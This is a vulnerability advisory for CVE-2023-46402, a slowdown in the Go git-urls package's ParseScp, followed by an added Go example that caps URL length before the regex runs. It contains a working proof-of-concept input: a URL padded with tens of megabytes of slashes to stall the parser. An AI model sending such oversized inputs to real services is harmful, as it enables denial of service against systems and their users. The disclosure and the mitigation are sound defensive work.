Headline
CVE-2023-46402: Security issue in regex inside git-urls package
git-urls version 1.0.1 (a Go package) is vulnerable to ReDoS (Regular Expression Denial of Service).
[NAME OF AFFECTED PRODUCT(S)]
- https://pkg.go.dev/github.com/whilp/git-urls v1.0.1
[AFFECTED AND/OR FIXED VERSION(S)]
- v1.0.1
- Status: not fixed
[VULNERABILITY]
- Regex Denial of Service
[DESCRIPTION]
The regex on line 35 of urls.go is vulnerable to regular expression denial of service when a long input is supplied
in the directory-path component of the git URL.
With the payload below it is possible to cause a delay of about 7 seconds, but only because the path in the URL is very long. Here is the PoC:
package main
import (
	"fmt"
	"strings"
	"time"
	giturls "github.com/whilp/git-urls"
)
func main() {
	// Payload: a very long run of slashes in the path; tune the repeat count to reach a ~7 second delay.
	payload := strings.Repeat("////", 19000000)
	maliciousURL := "6en6ar@-:0////" + payload + "\\"
	begin := time.Now()
	// u, err := giturls.ParseScp("[email protected]:/remote/directory") // normal git url
	_, err := giturls.ParseScp(maliciousURL)
	if err != nil {
		fmt.Println("[ - ] Error ->", err)
	}
	// fmt.Println("[ + ] Url --> " + u.Host)
	elapsed := time.Since(begin)
	fmt.Printf("Function took %s\n", elapsed)
}
This vulnerable regex causes the application to spend a long time parsing the input. Note that Go's standard regexp package is RE2-based and guarantees linear-time matching, so the slowdown scales with the length of the input (tens of megabytes in the PoC above) rather than through catastrophic backtracking; for callers, bounding the length of a remote URL before handing it to the parser is the straightforward mitigation.
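The following is an added example, not code from git-urls or from the advisory author, showing the mitigation a caller can apply: cap the URL length before any regex runs. The pattern scpLike, the bound MaxURLLen and all inputs are assumptions constructed for the demonstration; scpLike is a stand-in scp-style matcher and is not the expression from urls.go.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
	"time"
)

// MaxURLLen is an assumed, application-chosen bound on remote URL length.
// Real git remotes are a few hundred bytes; megabyte-sized input is not a URL a user typed.
const MaxURLLen = 2048

var ErrURLTooLong = errors.New("git url exceeds maximum length")

// scpLike is a stand-in pattern for an scp-style remote (user@host:path).
// It is NOT the expression from git-urls urls.go; it only plays the role of
// "a regex that scans the whole input" for this demonstration.
var scpLike = regexp.MustCompile(`^(?:([^@/]+)@)?([^:/]+):(/?.*)$`)

// parseScpLike runs the regex over the full string, so cost grows with input length.
func parseScpLike(raw string) (user, host, path string, err error) {
	m := scpLike.FindStringSubmatch(raw)
	if m == nil {
		return "", "", "", fmt.Errorf("not an scp-like url: %q", truncate(raw, 40))
	}
	return m[1], m[2], m[3], nil
}

// guardedParse rejects oversized input before the regex ever runs, which is the
// cheap defence against length-driven slowdowns regardless of the pattern used.
func guardedParse(raw string) (user, host, path string, err error) {
	if len(raw) > MaxURLLen {
		return "", "", "", ErrURLTooLong
	}
	return parseScpLike(raw)
}

// timeParse reports how long a parser takes on one input.
func timeParse(parse func(string) (string, string, string, error), raw string) (time.Duration, error) {
	start := time.Now()
	_, _, _, err := parse(raw)
	return time.Since(start), err
}

func truncate(s string, n int) string {
	if len(s) <= n {
		return s
	}
	return s[:n] + "..."
}

func main() {
	// Constructed inputs: a benign remote and an oversized one shaped like the
	// advisory's PoC (a huge run of slashes in the path, far smaller than 76 MB).
	normal := "git@example.com:/remote/directory"
	huge := "6en6ar@-:0////" + strings.Repeat("////", 250000) + "\\"

	for _, in := range []string{normal, huge} {
		d, err := timeParse(parseScpLike, in)
		fmt.Printf("unguarded: len=%d took=%s err=%v\n", len(in), d, err)
		d, err = timeParse(guardedParse, in)
		fmt.Printf("guarded:   len=%d took=%s err=%v\n", len(in), d, err)
	}
}
```

The guarded path returns ErrURLTooLong in constant time for the oversized input, while the unguarded path still scans every byte; the exact timings depend on the machine, but the length check is what keeps an attacker from choosing the parser's running time.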